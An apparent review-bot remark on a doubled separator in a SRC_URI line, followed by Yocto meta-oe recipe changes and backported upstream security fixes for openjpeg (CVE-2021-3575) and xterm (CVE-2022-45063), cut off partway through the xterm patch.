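Review bot: The new `SRC_URI` for lv_lib_png has a doubled separator, `lv_lib_png;;protocol=https;branch=master`, which leaves an empty fetcher parameter between the URL and `protocol`. The fetcher may tolerate it, but the lv-drivers and lvgl recipes changed alongside use a single `;`, and an empty parameter is easy to trip over in later URL handling. The line should read `SRC_URI = "git://github.com/lvgl/lv_lib_png;protocol=https;branch=master"`.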
+++ b/meta-oe/recipes-graphics/openjpeg/openjpeg/CVE-2021-3575.patch
@@ -0,0 +1,45 @@
+From 7bd884f8750892de4f50bf4642fcfbe7011c6bdf Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 18 Feb 2024 17:02:25 +0100
+Subject: [PATCH] opj_decompress: fix off-by-one read heap-buffer-overflow in
+ sycc420_to_rgb() when x0 and y0 are odd (CVE-2021-3575, fixes #1347)
+
+Upstream-Status: Backport [https://github.com/uclouvain/openjpeg/commit/7bd884f8750892de4f50bf4642fcfbe7011c6bdf]
+CVE: CVE-2021-3575
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/bin/common/color.c | 12 ++++++++++--
+ 1 file changed, 10 insertions(+), 2 deletions(-)
+
+diff --git a/src/bin/common/color.c b/src/bin/common/color.c
+index 27f15f13..ae5d648d 100644
+--- a/src/bin/common/color.c
++++ b/src/bin/common/color.c
+@@ -358,7 +358,15 @@ static void sycc420_to_rgb(opj_image_t *img)
+ if (i < loopmaxh) {
+ size_t j;
+
+- for (j = 0U; j < (maxw & ~(size_t)1U); j += 2U) {
++ if (offx > 0U) {
++ sycc_to_rgb(offset, upb, *y, 0, 0, r, g, b);
++ ++y;
++ ++r;
++ ++g;
++ ++b;
++ }
++
++ for (j = 0U; j < (loopmaxw & ~(size_t)1U); j += 2U) {
+ sycc_to_rgb(offset, upb, *y, *cb, *cr, r, g, b);
+
+ ++y;
+@@ -375,7 +383,7 @@ static void sycc420_to_rgb(opj_image_t *img)
+ ++cb;
+ ++cr;
+ }
+- if (j < maxw) {
++ if (j < loopmaxw) {
+ sycc_to_rgb(offset, upb, *y, *cb, *cr, r, g, b);
+ }
+ }
+--
+2.39.3
diff --git a/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb b/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb
index 42d2b4efb0..a619c07aa4 100644
--- a/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb
+++ b/meta-oe/recipes-graphics/openjpeg/openjpeg_2.4.0.bb
@@ -11,6 +11,7 @@ SRC_URI = " \ file://0001-This-patch-fixed-include-dir-to-usr-include-.-Obviou.patch \ file://CVE-2021-29338.patch \ file://CVE-2022-1122.patch \ + file://CVE-2021-3575.patch \ " SRCREV = "37ac30ceff6640bbab502388c5e0fa0bff23f505" S = "${WORKDIR}/git"
@@ -26,4 +27,4 @@ EXTRA_OECMAKE += "-DOPENJPEG_INSTALL_LIB_DIR=${@d.getVar('baselib').replace('/', FILES:${PN} += "${libdir}/openjpeg*" -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-graphics/tslib/tslib_1.22.bb b/meta-oe/recipes-graphics/tslib/tslib_1.22.bb index c2000b264b..cb2563225f 100644 --- a/meta-oe/recipes-graphics/tslib/tslib_1.22.bb +++ b/meta-oe/recipes-graphics/tslib/tslib_1.22.bb @@ -81,3 +81,5 @@ FILES:tslib-uinput += "${bindir}/ts_uinput" FILES:tslib-tests = "${bindir}/ts_harvest ${bindir}/ts_print ${bindir}/ts_print_raw ${bindir}/ts_print_mt \ ${bindir}/ts_test ${bindir}/ts_test_mt ${bindir}/ts_verify ${bindir}/ts_finddev ${bindir}/ts_conf" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb b/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb index 6a05e98e32..d394b33de2 100644 --- a/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb +++ b/meta-oe/recipes-graphics/xorg-app/xkbutils_1.0.4.bb @@ -13,7 +13,5 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=64322fab5239f5c8d97cf6e0e14f1c62" DEPENDS += "libxaw libxkbfile" -BBCLASSEXTEND = "native" - SRC_URI[md5sum] = "502b14843f610af977dffc6cbf2102d5" SRC_URI[sha256sum] = "d2a18ab90275e8bca028773c44264d2266dab70853db4321bdbc18da75148130" diff --git a/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb b/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb index 30a1e089e3..a9a8acf05c 100644 --- a/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb +++ b/meta-oe/recipes-graphics/xorg-app/xsetroot_1.1.2.bb @@ -8,7 +8,6 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=6ea29dbee22324787c061f039e0529de" DEPENDS += "xbitmaps libxcursor" -BBCLASSEXTEND = "native" SRC_URI[md5sum] = "5fe769c8777a6e873ed1305e4ce2c353" SRC_URI[sha256sum] = "10c442ba23591fb5470cea477a0aa5f679371f4f879c8387a1d9d05637ae417c" 
diff --git a/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2022-45063.patch b/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2022-45063.patch new file mode 100644 index 0000000000..167c326822 --- /dev/null +++ b/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2022-45063.patch 
@@ -0,0 +1,782 @@ +From 787636674918873a091e7a4ef5977263ba982322 Mon Sep 17 00:00:00 2001 +From: "Thomas E. Dickey" <dickey@invisible-island.net> +Date: Sun, 23 Oct 2022 22:59:52 +0000 +Subject: [PATCH] snapshot of project "xterm", label xterm-374c + +Upstream-Status: https://github.com/ThomasDickey/xterm-snapshots/commit/787636674918873a091e7a4ef5977263ba982322 +CVE: CVE-2022-45063 + +Signed-off-by: Siddharth Doshi <sdoshi@mvista.com> +--- + button.c | 14 +-- + charproc.c | 9 +- + doublechr.c | 4 +- + fontutils.c | 266 ++++++++++++++++++++++++++----------------------- + fontutils.h | 4 +- + misc.c | 7 +- + screen.c | 2 +- + xterm.h | 2 +- + xterm.log.html | 6 ++ + 9 files changed, 163 insertions(+), 151 deletions(-) + +diff --git a/button.c b/button.c +index f10092a..0bbf76e 100644 +--- a/button.c ++++ b/button.c +@@ -2051,13 +2051,8 @@ void + UnmapSelections(XtermWidget xw) + { + TScreen *screen = TScreenOf(xw); +- Cardinal n; + +- if (screen->mappedSelect) { +- for (n = 0; screen->mappedSelect[n] != 0; ++n) +- free((void *) screen->mappedSelect[n]); +- FreeAndNull(screen->mappedSelect); +- } ++ FreeAndNull(screen->mappedSelect); + } + + /* +@@ -2093,14 +2088,11 @@ MapSelections(XtermWidget xw, String *params, Cardinal num_params) + if ((result = TypeMallocN(String, num_params + 1)) != 0) { + result[num_params] = 0; + for (j = 0; j < num_params; ++j) { +- result[j] = x_strdup((isSELECT(params[j]) ++ result[j] = (String) (isSELECT(params[j]) + ? 
mapTo +- : params[j])); ++ : params[j]); + if (result[j] == 0) { + UnmapSelections(xw); +- while (j != 0) { +- free((void *) result[--j]); +- } + FreeAndNull(result); + break; + } +diff --git a/charproc.c b/charproc.c +index 2a3c69a..91cbcea 100644 +--- a/charproc.c ++++ b/charproc.c +@@ -13605,7 +13605,6 @@ DoSetSelectedFont(Widget w, + Bell(xw, XkbBI_MinorError, 0); + } else { + Boolean failed = False; +- int oldFont = TScreenOf(xw)->menu_font_number; + char *save = TScreenOf(xw)->SelectFontName(); + char *val; + char *test; +@@ -13650,10 +13649,6 @@ DoSetSelectedFont(Widget w, + failed = True; + } + if (failed) { +- (void) xtermLoadFont(xw, +- xtermFontName(TScreenOf(xw)->MenuFontName(oldFont)), +- True, +- oldFont); + Bell(xw, XkbBI_MinorError, 0); + } + free(used); +@@ -13662,7 +13657,7 @@ DoSetSelectedFont(Widget w, + } + } + +-void ++Bool + FindFontSelection(XtermWidget xw, const char *atom_name, Bool justprobe) + { + TScreen *screen = TScreenOf(xw); +@@ -13702,7 +13697,7 @@ FindFontSelection(XtermWidget xw, const char *atom_name, Bool justprobe) + DoSetSelectedFont, NULL, + XtLastTimestampProcessed(XtDisplay(xw))); + } +- return; ++ return (screen->SelectFontName() != NULL) ? 
True : False; + } + + Bool +diff --git a/doublechr.c b/doublechr.c +index a802e32..6416849 100644 +--- a/doublechr.c ++++ b/doublechr.c +@@ -295,7 +295,7 @@ xterm_DoubleGC(XTermDraw * params, GC old_gc, int *inxp) + temp.flags = (params->attr_flags & BOLD); + temp.warn = fwResource; + +- if (!xtermOpenFont(params->xw, name, &temp, False)) { ++ if (!xtermOpenFont(params->xw, name, &temp, NULL, False)) { + XTermDraw local = *params; + char *nname; + +@@ -304,7 +304,7 @@ xterm_DoubleGC(XTermDraw * params, GC old_gc, int *inxp) + nname = xtermSpecialFont(&local); + if (nname != 0) { + found = (Boolean) xtermOpenFont(params->xw, nname, &temp, +- False); ++ NULL, False); + free(nname); + } + } else { +diff --git a/fontutils.c b/fontutils.c +index 1646b4b..71f4ec2 100644 +--- a/fontutils.c ++++ b/fontutils.c +@@ -92,9 +92,9 @@ + } + + #define FREE_FNAME(field) \ +- if (fonts == 0 || myfonts.field != fonts->field) { \ +- FREE_STRING(myfonts.field); \ +- myfonts.field = 0; \ ++ if (fonts == 0 || new_fnames.field != fonts->field) { \ ++ FREE_STRING(new_fnames.field); \ ++ new_fnames.field = 0; \ + } + + /* +@@ -573,7 +573,7 @@ open_italic_font(XtermWidget xw, int n, FontNameProperties *fp, XTermFonts * dat + if ((name = italic_font_name(fp, slant[pass])) != 0) { + TRACE(("open_italic_font %s %s\n", + whichFontEnum((VTFontEnum) n), name)); +- if (xtermOpenFont(xw, name, data, False)) { ++ if (xtermOpenFont(xw, name, data, NULL, False)) { + result = (data->fs != 0); + #if OPT_REPORT_FONTS + if (resource.reportFonts) { +@@ -1037,20 +1037,26 @@ xtermLoadQueryFont(XtermWidget xw, const char *name) + } + + /* +- * Open the given font and verify that it is non-empty. Return a null on ++ * Open the given font and verify that it is non-empty. Return false on + * failure. 
+ */ + Bool + xtermOpenFont(XtermWidget xw, + const char *name, + XTermFonts * result, ++ XTermFonts * current, + Bool force) + { + Bool code = False; + + TRACE(("xtermOpenFont %d:%d '%s'\n", + result->warn, xw->misc.fontWarnings, NonNull(name))); ++ + if (!IsEmpty(name)) { ++ Bool existing = (current != NULL ++ && current->fs != NULL ++ && current->fn != NULL); ++ + if ((result->fs = xtermLoadQueryFont(xw, name)) != 0) { + code = True; + if (EmptyFont(result->fs)) { +@@ -1069,9 +1075,13 @@ xtermOpenFont(XtermWidget xw, + } else { + TRACE(("xtermOpenFont: cannot load font '%s'\n", name)); + } +- if (force) { ++ if (existing) { ++ TRACE(("...continue using font '%s'\n", current->fn)); ++ result->fn = x_strdup(current->fn); ++ result->fs = current->fs; ++ } else if (force) { + NoFontWarning(result); +- code = xtermOpenFont(xw, DEFFONT, result, True); ++ code = xtermOpenFont(xw, DEFFONT, result, NULL, True); + } + } + } +@@ -1321,6 +1331,7 @@ static Bool + loadNormFP(XtermWidget xw, + char **nameOutP, + XTermFonts * infoOut, ++ XTermFonts * current, + int fontnum) + { + Bool status = True; +@@ -1330,7 +1341,7 @@ loadNormFP(XtermWidget xw, + if (!xtermOpenFont(xw, + *nameOutP, + infoOut, +- (fontnum == fontMenu_default))) { ++ current, (fontnum == fontMenu_default))) { + /* + * If we are opening the default font, and it happens to be missing, + * force that to the compiled-in default font, e.g., "fixed". 
If we +@@ -1365,10 +1376,10 @@ loadBoldFP(XtermWidget xw, + if (fp != 0) { + NoFontWarning(infoOut); + *nameOutP = bold_font_name(fp, fp->average_width); +- if (!xtermOpenFont(xw, *nameOutP, infoOut, False)) { ++ if (!xtermOpenFont(xw, *nameOutP, infoOut, NULL, False)) { + free(*nameOutP); + *nameOutP = bold_font_name(fp, -1); +- xtermOpenFont(xw, *nameOutP, infoOut, False); ++ xtermOpenFont(xw, *nameOutP, infoOut, NULL, False); + } + TRACE(("...derived bold '%s'\n", NonNull(*nameOutP))); + } +@@ -1386,7 +1397,7 @@ loadBoldFP(XtermWidget xw, + TRACE(("...did not get a matching bold font\n")); + } + free(normal); +- } else if (!xtermOpenFont(xw, *nameOutP, infoOut, False)) { ++ } else if (!xtermOpenFont(xw, *nameOutP, infoOut, NULL, False)) { + xtermCopyFontInfo(infoOut, infoRef); + TRACE(("...cannot load bold font '%s'\n", NonNull(*nameOutP))); + } else { +@@ -1440,7 +1451,7 @@ loadWideFP(XtermWidget xw, + } + + if (check_fontname(*nameOutP)) { +- if (xtermOpenFont(xw, *nameOutP, infoOut, False) ++ if (xtermOpenFont(xw, *nameOutP, infoOut, NULL, False) + && is_derived_font_name(*nameOutP) + && EmptyFont(infoOut->fs)) { + xtermCloseFont2(xw, infoOut - fWide, fWide); +@@ -1493,7 +1504,7 @@ loadWBoldFP(XtermWidget xw, + + if (check_fontname(*nameOutP)) { + +- if (xtermOpenFont(xw, *nameOutP, infoOut, False) ++ if (xtermOpenFont(xw, *nameOutP, infoOut, NULL, False) + && is_derived_font_name(*nameOutP) + && !compatibleWideCounts(wideInfoRef->fs, infoOut->fs)) { + xtermCloseFont2(xw, infoOut - fWBold, fWBold); +@@ -1546,6 +1557,10 @@ loadWBoldFP(XtermWidget xw, + } + #endif + ++/* ++ * Load a given bitmap font, along with the bold/wide variants. ++ * Returns nonzero on success. 
++ */ + int + xtermLoadFont(XtermWidget xw, + const VTFontNames * fonts, +@@ -1555,33 +1570,37 @@ xtermLoadFont(XtermWidget xw, + TScreen *screen = TScreenOf(xw); + VTwin *win = WhichVWin(screen); + +- VTFontNames myfonts; +- XTermFonts fnts[fMAX]; ++ VTFontNames new_fnames; ++ XTermFonts new_fonts[fMAX]; ++ XTermFonts old_fonts[fMAX]; + char *tmpname = NULL; + Boolean proportional = False; ++ Boolean recovered; ++ int code = 0; + +- memset(&myfonts, 0, sizeof(myfonts)); +- memset(fnts, 0, sizeof(fnts)); ++ memset(&new_fnames, 0, sizeof(new_fnames)); ++ memset(new_fonts, 0, sizeof(new_fonts)); ++ memcpy(&old_fonts, screen->fnts, sizeof(old_fonts)); + + if (fonts != 0) +- myfonts = *fonts; +- if (!check_fontname(myfonts.f_n)) +- return 0; ++ new_fnames = *fonts; ++ if (!check_fontname(new_fnames.f_n)) ++ return code; + + if (fontnum == fontMenu_fontescape +- && myfonts.f_n != screen->MenuFontName(fontnum)) { +- if ((tmpname = x_strdup(myfonts.f_n)) == 0) +- return 0; ++ && new_fnames.f_n != screen->MenuFontName(fontnum)) { ++ if ((tmpname = x_strdup(new_fnames.f_n)) == 0) ++ return code; + } + +- TRACE(("Begin Cgs - xtermLoadFont(%s)\n", myfonts.f_n)); ++ TRACE(("Begin Cgs - xtermLoadFont(%s)\n", new_fnames.f_n)); + releaseWindowGCs(xw, win); + + #define DbgResource(name, field, index) \ + TRACE(("xtermLoadFont #%d "name" %s%s\n", \ + fontnum, \ +- (fnts[index].warn == fwResource) ? "*" : " ", \ +- NonNull(myfonts.field))) ++ (new_fonts[index].warn == fwResource) ? 
"*" : " ", \ ++ NonNull(new_fnames.field))) + DbgResource("normal", f_n, fNorm); + DbgResource("bold ", f_b, fBold); + #if OPT_WIDE_CHARS +@@ -1590,16 +1609,17 @@ xtermLoadFont(XtermWidget xw, + #endif + + if (!loadNormFP(xw, +- &myfonts.f_n, +- &fnts[fNorm], ++ &new_fnames.f_n, ++ &new_fonts[fNorm], ++ &old_fonts[fNorm], + fontnum)) + goto bad; + + if (!loadBoldFP(xw, +- &myfonts.f_b, +- &fnts[fBold], +- myfonts.f_n, +- &fnts[fNorm], ++ &new_fnames.f_b, ++ &new_fonts[fBold], ++ new_fnames.f_n, ++ &new_fonts[fNorm], + fontnum)) + goto bad; + +@@ -1611,20 +1631,20 @@ xtermLoadFont(XtermWidget xw, + if_OPT_WIDE_CHARS(screen, { + + if (!loadWideFP(xw, +- &myfonts.f_w, +- &fnts[fWide], +- myfonts.f_n, +- &fnts[fNorm], ++ &new_fnames.f_w, ++ &new_fonts[fWide], ++ new_fnames.f_n, ++ &new_fonts[fNorm], + fontnum)) + goto bad; + + if (!loadWBoldFP(xw, +- &myfonts.f_wb, +- &fnts[fWBold], +- myfonts.f_w, +- &fnts[fWide], +- myfonts.f_b, +- &fnts[fBold], ++ &new_fnames.f_wb, ++ &new_fonts[fWBold], ++ new_fnames.f_w, ++ &new_fonts[fWide], ++ new_fnames.f_b, ++ &new_fonts[fBold], + fontnum)) + goto bad; + +@@ -1634,30 +1654,30 @@ xtermLoadFont(XtermWidget xw, + * Normal/bold fonts should be the same width. Also, the min/max + * values should be the same. + */ +- if (fnts[fNorm].fs != 0 +- && fnts[fBold].fs != 0 +- && (!is_fixed_font(fnts[fNorm].fs) +- || !is_fixed_font(fnts[fBold].fs) +- || differing_widths(fnts[fNorm].fs, fnts[fBold].fs))) { ++ if (new_fonts[fNorm].fs != 0 ++ && new_fonts[fBold].fs != 0 ++ && (!is_fixed_font(new_fonts[fNorm].fs) ++ || !is_fixed_font(new_fonts[fBold].fs) ++ || differing_widths(new_fonts[fNorm].fs, new_fonts[fBold].fs))) { + TRACE(("Proportional font! 
normal %d/%d, bold %d/%d\n", +- fnts[fNorm].fs->min_bounds.width, +- fnts[fNorm].fs->max_bounds.width, +- fnts[fBold].fs->min_bounds.width, +- fnts[fBold].fs->max_bounds.width)); ++ new_fonts[fNorm].fs->min_bounds.width, ++ new_fonts[fNorm].fs->max_bounds.width, ++ new_fonts[fBold].fs->min_bounds.width, ++ new_fonts[fBold].fs->max_bounds.width)); + proportional = True; + } + + if_OPT_WIDE_CHARS(screen, { +- if (fnts[fWide].fs != 0 +- && fnts[fWBold].fs != 0 +- && (!is_fixed_font(fnts[fWide].fs) +- || !is_fixed_font(fnts[fWBold].fs) +- || differing_widths(fnts[fWide].fs, fnts[fWBold].fs))) { ++ if (new_fonts[fWide].fs != 0 ++ && new_fonts[fWBold].fs != 0 ++ && (!is_fixed_font(new_fonts[fWide].fs) ++ || !is_fixed_font(new_fonts[fWBold].fs) ++ || differing_widths(new_fonts[fWide].fs, new_fonts[fWBold].fs))) { + TRACE(("Proportional font! wide %d/%d, wide bold %d/%d\n", +- fnts[fWide].fs->min_bounds.width, +- fnts[fWide].fs->max_bounds.width, +- fnts[fWBold].fs->min_bounds.width, +- fnts[fWBold].fs->max_bounds.width)); ++ new_fonts[fWide].fs->min_bounds.width, ++ new_fonts[fWide].fs->max_bounds.width, ++ new_fonts[fWBold].fs->min_bounds.width, ++ new_fonts[fWBold].fs->max_bounds.width)); + proportional = True; + } + }); +@@ -1676,13 +1696,13 @@ xtermLoadFont(XtermWidget xw, + screen->ifnts_ok = False; + #endif + +- xtermCopyFontInfo(GetNormalFont(screen, fNorm), &fnts[fNorm]); +- xtermCopyFontInfo(GetNormalFont(screen, fBold), &fnts[fBold]); ++ xtermCopyFontInfo(GetNormalFont(screen, fNorm), &new_fonts[fNorm]); ++ xtermCopyFontInfo(GetNormalFont(screen, fBold), &new_fonts[fBold]); + #if OPT_WIDE_CHARS +- xtermCopyFontInfo(GetNormalFont(screen, fWide), &fnts[fWide]); +- if (fnts[fWBold].fs == NULL) +- xtermCopyFontInfo(GetNormalFont(screen, fWide), &fnts[fWide]); +- xtermCopyFontInfo(GetNormalFont(screen, fWBold), &fnts[fWBold]); ++ xtermCopyFontInfo(GetNormalFont(screen, fWide), &new_fonts[fWide]); ++ if (new_fonts[fWBold].fs == NULL) ++ 
xtermCopyFontInfo(GetNormalFont(screen, fWide), &new_fonts[fWide]); ++ xtermCopyFontInfo(GetNormalFont(screen, fWBold), &new_fonts[fWBold]); + #endif + + xtermUpdateFontGCs(xw, getNormalFont); +@@ -1713,7 +1733,7 @@ xtermLoadFont(XtermWidget xw, + unsigned ch; + + #if OPT_TRACE +-#define TRACE_MISS(index) show_font_misses(#index, &fnts[index]) ++#define TRACE_MISS(index) show_font_misses(#index, &new_fonts[index]) + TRACE_MISS(fNorm); + TRACE_MISS(fBold); + #if OPT_WIDE_CHARS +@@ -1730,8 +1750,8 @@ xtermLoadFont(XtermWidget xw, + if ((n != UCS_REPL) + && (n != ch) + && (screen->fnt_boxes & 2)) { +- if (xtermMissingChar(n, &fnts[fNorm]) || +- xtermMissingChar(n, &fnts[fBold])) { ++ if (xtermMissingChar(n, &new_fonts[fNorm]) || ++ xtermMissingChar(n, &new_fonts[fBold])) { + UIntClr(screen->fnt_boxes, 2); + TRACE(("missing graphics character #%d, U+%04X\n", + ch, n)); +@@ -1743,12 +1763,12 @@ xtermLoadFont(XtermWidget xw, + #endif + + for (ch = 1; ch < 32; ch++) { +- if (xtermMissingChar(ch, &fnts[fNorm])) { ++ if (xtermMissingChar(ch, &new_fonts[fNorm])) { + TRACE(("missing normal char #%d\n", ch)); + UIntClr(screen->fnt_boxes, 1); + break; + } +- if (xtermMissingChar(ch, &fnts[fBold])) { ++ if (xtermMissingChar(ch, &new_fonts[fBold])) { + TRACE(("missing bold char #%d\n", ch)); + UIntClr(screen->fnt_boxes, 1); + break; +@@ -1765,8 +1785,8 @@ xtermLoadFont(XtermWidget xw, + screen->enbolden = screen->bold_mode; + } else { + screen->enbolden = screen->bold_mode +- && ((fnts[fNorm].fs == fnts[fBold].fs) +- || same_font_name(myfonts.f_n, myfonts.f_b)); ++ && ((new_fonts[fNorm].fs == new_fonts[fBold].fs) ++ || same_font_name(new_fnames.f_n, new_fnames.f_b)); + } + TRACE(("Will %suse 1-pixel offset/overstrike to simulate bold\n", + screen->enbolden ? 
"" : "not ")); +@@ -1782,7 +1802,7 @@ xtermLoadFont(XtermWidget xw, + update_font_escape(); + } + #if OPT_SHIFT_FONTS +- screen->menu_font_sizes[fontnum] = FontSize(fnts[fNorm].fs); ++ screen->menu_font_sizes[fontnum] = FontSize(new_fonts[fNorm].fs); + #endif + } + set_cursor_gcs(xw); +@@ -1797,20 +1817,21 @@ xtermLoadFont(XtermWidget xw, + FREE_FNAME(f_w); + FREE_FNAME(f_wb); + #endif +- if (fnts[fNorm].fn == fnts[fBold].fn) { +- free(fnts[fNorm].fn); ++ if (new_fonts[fNorm].fn == new_fonts[fBold].fn) { ++ free(new_fonts[fNorm].fn); + } else { +- free(fnts[fNorm].fn); +- free(fnts[fBold].fn); ++ free(new_fonts[fNorm].fn); ++ free(new_fonts[fBold].fn); + } + #if OPT_WIDE_CHARS +- free(fnts[fWide].fn); +- free(fnts[fWBold].fn); ++ free(new_fonts[fWide].fn); ++ free(new_fonts[fWBold].fn); + #endif + xtermSetWinSize(xw); + return 1; + + bad: ++ recovered = False; + free(tmpname); + + #if OPT_RENDERFONT +@@ -1820,15 +1841,15 @@ xtermLoadFont(XtermWidget xw, + SetItemSensitivity(fontMenuEntries[fontnum].widget, True); + #endif + Bell(xw, XkbBI_MinorError, 0); +- myfonts.f_n = screen->MenuFontName(old_fontnum); +- return xtermLoadFont(xw, &myfonts, doresize, old_fontnum); +- } else if (x_strcasecmp(myfonts.f_n, DEFFONT)) { +- int code; +- +- myfonts.f_n = x_strdup(DEFFONT); +- TRACE(("...recovering for TrueType fonts\n")); +- code = xtermLoadFont(xw, &myfonts, doresize, fontnum); +- if (code) { ++ new_fnames.f_n = screen->MenuFontName(old_fontnum); ++ if (xtermLoadFont(xw, &new_fnames, doresize, old_fontnum)) ++ recovered = True; ++ } else if (x_strcasecmp(new_fnames.f_n, DEFFONT) ++ && x_strcasecmp(new_fnames.f_n, old_fonts[fNorm].fn)) { ++ new_fnames.f_n = x_strdup(old_fonts[fNorm].fn); ++ TRACE(("...recovering from failed font-load\n")); ++ if (xtermLoadFont(xw, &new_fnames, doresize, fontnum)) { ++ recovered = True; + if (fontnum != fontMenu_fontsel) { + SetItemSensitivity(fontMenuEntries[fontnum].widget, + UsingRenderFont(xw)); +@@ -1837,15 +1858,15 @@ 
xtermLoadFont(XtermWidget xw, + FontHeight(screen), + FontWidth(screen))); + } +- return code; + } + #endif +- +- releaseWindowGCs(xw, win); +- +- xtermCloseFonts(xw, fnts); +- TRACE(("Fail Cgs - xtermLoadFont\n")); +- return 0; ++ if (!recovered) { ++ releaseWindowGCs(xw, win); ++ xtermCloseFonts(xw, new_fonts); ++ TRACE(("Fail Cgs - xtermLoadFont\n")); ++ code = 0; ++ } ++ return code; + } + + #if OPT_WIDE_ATTRS +@@ -1893,7 +1914,7 @@ xtermLoadItalics(XtermWidget xw) + } else { + xtermOpenFont(xw, + getNormalFont(screen, n)->fn, +- data, False); ++ data, NULL, False); + } + } + } +@@ -4250,6 +4271,8 @@ findXftGlyph(XtermWidget xw, XftFont *given, unsigned wc) + } + #endif + if (foundXftGlyph(xw, check, wc)) { ++ (void) added; ++ (void) actual; + markXftOpened(xw, which, n, wc); + reportXftFonts(xw, check, "fallback", tag, myReport); + result = check; +@@ -4451,7 +4474,7 @@ lookupOneFontSize(XtermWidget xw, int fontnum) + + memset(&fnt, 0, sizeof(fnt)); + screen->menu_font_sizes[fontnum] = -1; +- if (xtermOpenFont(xw, screen->MenuFontName(fontnum), &fnt, True)) { ++ if (xtermOpenFont(xw, screen->MenuFontName(fontnum), &fnt, NULL, True)) { + if (fontnum <= fontMenu_lastBuiltin + || strcmp(fnt.fn, DEFFONT)) { + screen->menu_font_sizes[fontnum] = FontSize(fnt.fs); +@@ -4864,13 +4887,14 @@ HandleSetFont(Widget w, + } + } + +-void ++Bool + SetVTFont(XtermWidget xw, + int which, + Bool doresize, + const VTFontNames * fonts) + { + TScreen *screen = TScreenOf(xw); ++ Bool result = False; + + TRACE(("SetVTFont(which=%d, f_n=%s, f_b=%s)\n", which, + (fonts && fonts->f_n) ? 
fonts->f_n : "<null>", +@@ -4879,34 +4903,31 @@ SetVTFont(XtermWidget xw, + if (IsIcon(screen)) { + Bell(xw, XkbBI_MinorError, 0); + } else if (which >= 0 && which < NMENUFONTS) { +- VTFontNames myfonts; ++ VTFontNames new_fnames; + +- memset(&myfonts, 0, sizeof(myfonts)); ++ memset(&new_fnames, 0, sizeof(new_fnames)); + if (fonts != 0) +- myfonts = *fonts; ++ new_fnames = *fonts; + + if (which == fontMenu_fontsel) { /* go get the selection */ +- FindFontSelection(xw, myfonts.f_n, False); ++ result = FindFontSelection(xw, new_fnames.f_n, False); + } else { +- int oldFont = screen->menu_font_number; +- + #define USE_CACHED(field, name) \ +- if (myfonts.field == 0) { \ +- myfonts.field = x_strdup(screen->menu_font_names[which][name]); \ +- TRACE(("set myfonts." #field " from menu_font_names[%d][" #name "] %s\n", \ +- which, NonNull(myfonts.field))); \ ++ if (new_fnames.field == NULL) { \ ++ new_fnames.field = x_strdup(screen->menu_font_names[which][name]); \ ++ TRACE(("set new_fnames." #field " from menu_font_names[%d][" #name "] %s\n", \ ++ which, NonNull(new_fnames.field))); \ + } else { \ +- TRACE(("set myfonts." #field " reused\n")); \ ++ TRACE(("set new_fnames." 
#field " reused\n")); \ + } + #define SAVE_FNAME(field, name) \ +- if (myfonts.field != 0) { \ +- if (screen->menu_font_names[which][name] == 0 \ +- || strcmp(screen->menu_font_names[which][name], myfonts.field)) { \ +- TRACE(("updating menu_font_names[%d][" #name "] to \"%s\"\n", \ +- which, myfonts.field)); \ +- FREE_STRING(screen->menu_font_names[which][name]); \ +- screen->menu_font_names[which][name] = x_strdup(myfonts.field); \ +- } \ ++ if (new_fnames.field != NULL \ ++ && (screen->menu_font_names[which][name] == NULL \ ++ || strcmp(screen->menu_font_names[which][name], new_fnames.field))) { \ ++ TRACE(("updating menu_font_names[%d][" #name "] to \"%s\"\n", \ ++ which, new_fnames.field)); \ ++ FREE_STRING(screen->menu_font_names[which][name]); \ ++ screen->menu_font_names[which][name] = x_strdup(new_fnames.field); \ + } + + USE_CACHED(f_n, fNorm); +@@ -4916,7 +4937,7 @@ SetVTFont(XtermWidget xw, + USE_CACHED(f_wb, fWBold); + #endif + if (xtermLoadFont(xw, +- &myfonts, ++ &new_fnames, + doresize, which)) { + /* + * If successful, save the data so that a subsequent query via +@@ -4928,10 +4949,8 @@ SetVTFont(XtermWidget xw, + SAVE_FNAME(f_w, fWide); + SAVE_FNAME(f_wb, fWBold); + #endif ++ result = True; + } else { +- (void) xtermLoadFont(xw, +- xtermFontName(screen->MenuFontName(oldFont)), +- doresize, oldFont); + Bell(xw, XkbBI_MinorError, 0); + } + FREE_FNAME(f_n); +@@ -4944,7 +4963,8 @@ SetVTFont(XtermWidget xw, + } else { + Bell(xw, XkbBI_MinorError, 0); + } +- return; ++ TRACE(("...SetVTFont: %d\n", result)); ++ return result; + } + + #if OPT_RENDERFONT +diff --git a/fontutils.h b/fontutils.h +index 2267f24..5b3afe0 100644 +--- a/fontutils.h ++++ b/fontutils.h +@@ -37,7 +37,7 @@ + /* *INDENT-OFF* */ + + extern Bool xtermLoadDefaultFonts (XtermWidget /* xw */); +-extern Bool xtermOpenFont (XtermWidget /* xw */, const char */* name */, XTermFonts * /* result */, Bool /* force */); ++extern Bool xtermOpenFont (XtermWidget /* xw */, const char */* name */, 
